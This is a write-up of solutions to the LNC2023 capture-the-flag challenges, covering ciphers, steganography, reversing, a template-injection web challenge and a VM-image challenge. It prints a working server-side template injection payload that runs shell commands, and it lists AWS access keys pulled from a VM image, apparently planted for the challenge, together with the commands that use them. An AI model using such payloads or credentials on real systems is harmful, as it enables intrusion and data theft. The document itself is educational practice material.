https://ctf.lagncra.sh/challenges

Web

DotDashDot

Description: An ancient relic of the past… what’s it doing here?

http://dotdashdot.d.lagncra.sh

There is one comment in html source

image

http://dotdashdot.d.lagncra.sh/translate

image

It will convert our input to morse code and it is vulnerable to SSTI.

test payload: --> {{8*8}}

image

Now we can use RCE payload to read flag

Payload: -->{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /www/flag.txt').read() }}

image
flag: LNC2023{T3mpl4t35_4r3_c00L_bUt_d4nG3r0u5_776843}

The Password

Description: You stumble across a secret website that asks for your password…

thepassword.s.lagncra.sh

flag is in the js file.

http://thepassword.s.lagncra.sh/password.js

flag: LNC2023{s0m3t1me$_1t_i5_pr377y_s1aY}

Crypto

You Don’t Know About Us

Description: _You ain’t gonna understand our language!

JZUWGZJAORZHSIDIOVWWC3RBEBKGQ2LTEBUXGIDUNBSSAYLDOR2WC3BAMVXGG33EMVSCA3LFONZWC43HMU5AUQSEKMZDAMRTPN2GWY3SORVWG4T5_

It is Base32 > Rot 10(Rot13 with n=10)

flag:  LNC2023{dumbdumb}

Zig Zag

Description: Oh shoot, I should build some RAIL with FENCE.

N2ISTVSLC03HSAQIEBIU2TWUOO

It is Rail Fence (Zig-Zag) Cipher

Decoder for reference: https://www.dcode.fr/rail-fence-cipher

flag: LNC2023{THISWASQUITEOBVIOUS}

Hope

Description: Can you find the reason why the survivals are still surviving? The reason for their strong suvival skills can be found after decrypting their message. Flag format is LNC2023{flag}

attached file: message.txt

it contains following:

Encoded Key: 36f9a5900a637b0248cf7c8fe3af44ca

Encoded Message: …- -.– .. .. .. .– – .-.. .– -..-

Encoded Key is md5 hash of SUPERKEY. https://crackstation.net/

Encoded Message is Morse code which decode to VYIIIWMLWX

It is Vigenere Cipher and key to decrypt is SUPERKEY

decoded text is DETERMINED

flag: LNC2023{DETERMINED}

Forensics

Base Madness

Description: Zip files and encryptions were used often in the modern times. You came across this 2 files. One containing a text one is a zip file. Are you able to decipher it?

two files are given: base_madness.txt, base_madness.zip

base_madness.txt is base64 encoded: thisisthepasswordtounlockthefile

unzip the file with this file. There is one image ayaka.png

open this image with notepad there is flag.

image
flag:  LNC2023{ayaka_is_key}

Wave

Description: I love this spectrum. My kind of vibe.

Attached file: wave.wav

As the description suggests flag is in Spectrogram of audio file.

image

Tool used: Sonic Visualizer

flag: LNC2023{annoyingwave}

Incompetent

Description: This is a sample description for my awesome challenge

Attached file: secret.zip

unzip the file and there are two more file: Homework.zip, password.docx (inside folder name Important)

Homework.zip have flag.docx inside but it is password protected. Password is in password.docx but not visible to us because it is in strings.

image

Reference: https://gchq.github.io/CyberChef/

password: kimiwadekinaiko

Now we can open flag.docx but flag is not visible because again it is in strings.

image
flag: LNC2023{konoyodeichibandekinaiko}

Embedment

Description: It looks like there is a secret message that is embeded into the picture. Find a way to retrieve the embeded materials from the image to obtain the flag.

attached file: Flag.png

word document file is embedded in this image.

to extract right click on image open with 7z as archive and save extracted files.

image

compress this extracted file to zip and rename to flag.docx now it will open as word document.

image
flag: LNC2023{S3cr3tF1aG}

Reverse

First Program

Description: This is the first program that was created in the Dystopian times can you help find the flag inside it?

one file is given: simplere

simplere: ELF 64-bit LSB pie executable

open this in Ghidra

we can see flag in side main()

image
flag: LNC2023{s1mpl3_4m_1_r1ghT?}

Misc

Hidden in Plain Sight

Description: UGH Ansi screwed up again! I wonder what sequence of events lead to this.

nc nc.lagncra.sh 8004

connecting to this is not showing anythig so let’s try to save this in file.

image

open this file with editor

image

There is flag.

less command also works. cat 1.txt |less

flag: LNC2023{ans1_c0ntr0l_s3qu3nc3s_damn_c00l}

Swiftly

Description: Looks like the message from the military to all remaining survivals have been damaged, find a way to read all the qr code to obtain the flag.

attached file: Flag.gif

to get the flag we have to extract the frames from gif: ffmpeg -i Flag.gif -vsync 0 out%d.png

and read the qr from extracted frames: zbarimg out* -q | sed 's/QR-Code://g' | tr '\n' '\0'

image
flag: LNC2023{Are_y0u_FaSt_En0ugh_4_th1s}

Boot to root

Pickle Rick

Description: Rick has turned himself into a pickle, can you find him before its too late…

Download: https://drive.google.com/file/d/1ZULGK4p7cJQHNabmDHdtki-g1xNfHu0f/view?usp=share_link

7z Password: &y9PBYf8gZ^996s9

After unzip we have pickle-shop.ova file we can use VMWare to run this machine but if we only want to see the file system we can do that with tools like 7z.

right click on pickle-shop.ova and open with 7z as archive

image

after looking many files we found aws credentials pickle-shop.ova\pickle-shop-disk1.vmdk\2.img\root\.aws\credentials

image

we found following credentials:

aws_access_key_id = AKIAZNKM5ODGICECDW5U
aws_secret_access_key = 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

configure awscli with these credentials: aws configure

image

Let’s check for s3 buckets: aws s3 ls

image

download the s3 bucket: aws s3 sync s3://lnc-pickle-shop .

image

flag is in this bucket

image
flag: LNC2023{1m_p1ckl3_r1111ck}

Happy Hacking